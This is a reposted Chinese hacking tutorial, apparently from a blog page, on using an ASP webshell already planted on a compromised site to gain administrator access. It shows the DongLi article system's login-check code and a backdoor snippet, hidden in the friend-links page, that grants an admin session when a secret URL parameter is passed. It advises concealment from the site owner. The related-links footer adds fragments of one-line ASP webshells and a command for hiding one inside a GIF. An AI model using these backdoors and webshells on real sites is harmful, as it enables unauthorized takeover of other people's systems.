巧妙配合asp木马取得管理权限 (1)

转载 2006年05月25日 23:34:00
前段时间泛滥成灾的动网论坛上传漏洞以及最近接二连三的各种asp系统暴露的上传漏洞,可能很多朋友手中有了很多webshell的肉鸡,至于选择怎么样这些小鸡的方式也是因人而异,有人继续提升权限,进一步入侵,也有人只是看看,马儿放上去了过了就忘记了,也有一些朋友,当webshell的新鲜劲儿过去了后台的神秘感和诱惑力也就大大增加。

  其实,对很多功能强大的系统而言,拿到后台也就是拿到了一个好的后门了,呵呵……但是现在比较新的版本的很多asp系统密码都是MD5加密然后配合严格的验证程序来验证的,但是我们就没有办法突破这些限制了吗?no!我今天就是要说怎么突破这些限制让我们直奔后台,有马儿厩是好办事,follow me……

  session欺骗篇

  首先简单说一下一般asp系统的身份验证原理。

  一般来说,后台管理员在登录页面输入账号密码后,程序会拿着他提交的用户名密码去数据库的管理员表里面找,如果有这个人的账号密码就认为你是管理员,然后给你一个表示你身份的session值。或者程序先把你的用户名密码提取出来,然后到数据库的管理员表里面取出管理员的账号密码来和你提交的相比较,如果相等,就跟上面一样给你个表示你身份的sesion值。然后你进入任何一个管理页面它都要首先验证你的session值,如果是管理员就让你通过,不是的话就引导你回到登录页面或者出现一些奇奇怪怪的警告,这些都跟程序员的个人喜好有关。

  知道了原理,我们现在的一个思路就是通过我们的asp木马来修改它的程序然后拿到一个管理员session,这样的话尽管我们没有管理员密码,但是我们一样在后台通行无阻了。我把这种方法称为session欺骗。限于篇幅不能每个系统都能详细说明,本文仅以动力文章系统为例来说明。

  动力文章系统3.51,(图一)

其实动力文章系统的所有版本全部通杀,包括动易。大家可以自己实践一下。

  我们先来看一下它的验证内容。动力文章3.51的验证页面在Admin_ChkLogin.asp,其验证内容如下:

  ……
  else
  rs("LastLoginIP")=Request.ServerVariables("REMOTE_ADDR") 
   rs("LastLoginTime")=now() 
   rs("LoginTimes")=rs("LoginTimes")+1 
   rs.update 
   session.Timeout=SessionTimeout 
   session("AdminName")=rs("username") 
   rs.close 
   set rs=nothing 
   call CloseConn() 
   Response.Redirect "Admin_Index.asp"


前面省略号是用户名密码不正确的验证,直到else,看一下,如果用户名密码正确就给你两个session值:

  session.Timeout=SessionTimeout

  session("AdminName")=rs("username")

  我们在看一下其他管理页面是怎么验证session的,admin_index.asp一开始就这样:

  看起来似乎很严密,但是我们看一下,它这里值验证一个AdminName的session,只要我们的session内容是AdminName的话不就可以通过了?好,我们开工,先去弄到它的管理员账号再说,这个不要我教你了吧?到他网站逛一下或者直接一点下载它的数据库来看都可以知道。我们找个页面来改一下,我找一个比较没人而内容较多的页面FriendSite.asp(友情链接页面)来改,呵呵,这样管理员也很难查得出来啊。用asp木马的编辑功能来编辑一下它的内容。在他页面下隐蔽处加上下面几句话:

  dim id

  id=trim(request("qwe"))

  if id="120" then

  session("AdminName")="admin" ‘这里是假设的,实际操作中可以改成你想要得管理员账号

  end if

  我简单说一下这句话的意思,就是说从地址栏取得hehe的值,如果hehe=120的话,那么系统就给我们一个值为admin的session。好了,我们输入看一下,图二:

怎么利用asp木马取得管理权限

前段时间泛滥成灾的动网论坛上传漏洞以及最近接二连三的各种asp系统暴露的上传漏洞,可能很多朋友手中有了很多webshell的肉鸡,至于选择怎么样这些小鸡的方式也是因人而异,有人继续提升权限,进一步入侵...
  • u012971242
  • u012971242
  • 2013-11-27 11:51:28
  • 684

巧妙配合asp木马取得后台管理权限顶(这个可是经典。。。自己体会我不多说了)

作者:aweige    来自:中国黑客红色军团前段时间泛滥成灾的动网论坛上传漏洞以及最近接二连三的各种asp系统暴露的上传漏洞,可能很多朋友手中有了很多webshell的肉鸡,至于选择怎么样这些小鸡...
  • freexploit
  • freexploit
  • 2004-11-02 13:24:00
  • 1608

ASP一句话木马大全

"" Then Execute(Request("MH"))%> ""then session("MH")=request("MH"):end if:if session("MH") execut...
  • eldn__
  • eldn__
  • 2012-12-30 10:35:47
  • 8414

asp一句话木马原理

一句话木马入侵原理 是典型的一句话木马服务端代码,将这个代码写入asp文件,就成了一句话木马服务端文件。  仔细观察一下这句代码,括号里的“#”是我们一句话的密码,我们可以把它改成任意字符,这样可以...
  • JackLiu16
  • JackLiu16
  • 2017-11-10 16:53:48
  • 649

一句话木马的使用

asp一句话木马:        Description: 类型不匹配: 'execute'      这个如何解决呢?     想出了一个好办法,只要用"eval"替换掉"e...
  • wljlwyq
  • wljlwyq
  • 2014-10-06 18:24:55
  • 1948

asp木马下载,免杀asp网页木马,超强提权ASP木马,asp后门下载

  • 2010年12月04日 07:22
  • 32KB
  • 下载

一个典型的ASP木马程序源码

Response.Write ("欢迎您");mypass="chinait"if request("userpass")=mypass thensession("admin")=mypassend ...
  • Beyond2007
  • Beyond2007
  • 2007-02-26 16:26:00
  • 1779

揭密如何写ASP木马后门

正常的: EnD fUNCtION  IF SEssIoN("web2a2dmin")"" TheN  iF REquesT.foRM("pass")=uSERPASS Then  SEsSIoN(...
  • fsdzsec
  • fsdzsec
  • 2016-11-13 10:36:46
  • 538

一句话图片木马

首先应该有图片一张(文件名为1.gif)。ASP一句话一个(文件名为1.asp)。一句话客户端一个。小马等 再用CMD下将ASP和GIF进行合并。 命令如下。copy /b 1.asp+1.g...
  • ccx_john
  • ccx_john
  • 2013-12-07 14:48:14
  • 1517

[转载]海阳顶端网ASP木马@2005α版全部源代码

信息来源:黑客手册"密码第一个是makelove,第二个是haiyangtop.126.com,查找替换这两个单词就可以改成别的密码了%> end if %>BODY {SCROLLBAR-FACE...
  • nonsenser
  • nonsenser
  • 2006-01-07 18:45:00
  • 1972
收藏助手
不良信息举报
您举报文章:巧妙配合asp木马取得管理权限 (1)
举报原因:
原因补充:

(最多只允许输入30个字)